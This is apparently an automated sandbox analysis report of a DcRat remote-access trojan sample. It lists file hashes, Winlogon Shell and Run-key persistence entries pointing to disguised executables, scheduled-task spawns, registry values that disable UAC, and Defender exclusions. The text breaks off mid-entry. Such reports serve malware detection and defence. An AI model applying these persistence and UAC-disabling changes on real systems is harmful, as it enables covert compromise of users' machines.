Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
14-05-2024 05:56
Behavioral task
behavioral1
Sample
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
Resource
win10v2004-20240508-en
General
-
Target
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe
-
Size
2.7MB
-
MD5
8cdae0ef9f7f5ab79ec5671644e1a0f0
-
SHA1
dfae9279327bb5658e9d95daae768bfaf4dca42f
-
SHA256
e4c8b1c4527c76289bb4247f0a02d3dd85545bdc59530f005941455d05826aed
-
SHA512
828146a24cc9ddac7e6e4f80df37356cbaf1bf93be1540b9cc3c5e49c7a46ef49f74ef48ba23998b5c388575aa792cc3f43043aadb15ff5b21eff841f49171f6
-
SSDEEP
49152:yH64y2XDuLlIY14o9/yDzr1xJ8XbRrC9mWvR08Yv7yP3GcY:yHfE5Ad8Xd295UmGc
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies WinLogon for persistence 2 TTPs 18 IoCs
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\lsm.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\wininit.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\csrss.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\lsm.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\wininit.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\csrss.exe\", \"C:\\Users\\Admin\\NetHood\\wininit.exe\", \"C:\\MSOCache\\All Users\\explorer.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\", \"C:\\Users\\Public\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\lsm.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\smss.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\lsm.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\wininit.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\lsm.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\wininit.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\csrss.exe\", \"C:\\Users\\Admin\\NetHood\\wininit.exe\", \"C:\\MSOCache\\All Users\\explorer.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Defender\\en-US\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\lsm.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\lsm.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\wininit.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\csrss.exe\", \"C:\\Users\\Admin\\NetHood\\wininit.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\lsm.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\wininit.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\csrss.exe\", \"C:\\Users\\Admin\\NetHood\\wininit.exe\", \"C:\\MSOCache\\All Users\\explorer.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\winlogon.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\lsm.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Downloads\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\", \"C:\\Users\\Default\\Favorites\\services.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\", \"C:\\Users\\Public\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\lsm.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\services.exe\", \"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\wininit.exe\", \"C:\\Users\\Public\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe -
Process spawned unexpected child process 54 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2380 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2520 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2508 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2908 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2284 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2480 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 616 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2440 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2680 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2756 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 348 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2772 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 316 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1552 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1624 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1864 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2352 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1472 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1512 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2032 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 832 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2000 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2320 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2896 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1924 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2800 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2220 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 660 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 624 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 940 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1640 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1784 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2796 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1060 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2372 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3008 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 444 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2108 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3032 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2840 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1696 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 944 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 236 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1740 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 888 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2960 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2996 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1848 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1992 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2052 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3048 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2308 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1844 1712 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1716 1712 schtasks.exe -
Processes:
services.exe8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" services.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" services.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" services.exe -
Processes:
resource yara_rule behavioral1/memory/2392-1-0x0000000000190000-0x0000000000450000-memory.dmp dcrat C:\Users\Default\Favorites\services.exe dcrat C:\Program Files (x86)\Windows Defender\fr-FR\RCX27F2.tmp dcrat behavioral1/memory/900-196-0x0000000000090000-0x0000000000350000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Executes dropped EXE 1 IoCs
Processes:
services.exepid process 900 services.exe -
Adds Run key to start application 2 TTPs 34 IoCs
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\wininit.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\csrss.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\MSOCache\\All Users\\explorer.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Users\\Admin\\NetHood\\wininit.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Public\\Downloads\\smss.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = 